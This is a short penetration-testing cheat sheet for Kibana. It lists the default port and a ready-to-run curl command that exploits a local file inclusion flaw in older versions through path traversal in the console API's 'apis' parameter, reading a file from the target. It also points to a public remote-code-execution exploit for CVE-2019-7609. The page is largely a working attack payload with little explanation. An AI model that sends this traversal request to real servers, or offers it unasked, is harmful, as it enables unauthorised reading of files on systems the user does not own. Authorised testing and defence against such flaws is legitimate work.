# Kibana Pentesting

A proprietary data visualization dashboard software for Elasticsearch. A default port is 5601.

### Vulnerabilities <a href="#vulnerabilities" id="vulnerabilities"></a>

#### Local File Inclusion (LFI) Version \\< 6.4.3 & 5.6.13 <a href="#local-file-inclusion-lfi-version-643-5613" id="local-file-inclusion-lfi-version-643-5613"></a>

```
curl http://<target-ip>:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt
```

#### Remote Code Execution (RCE) Version \\< 6.6.0 <a href="#remote-code-execution-rce-version-660" id="remote-code-execution-rce-version-660"></a>

Reference: <https://github.com/mpgn/CVE-2019-7609>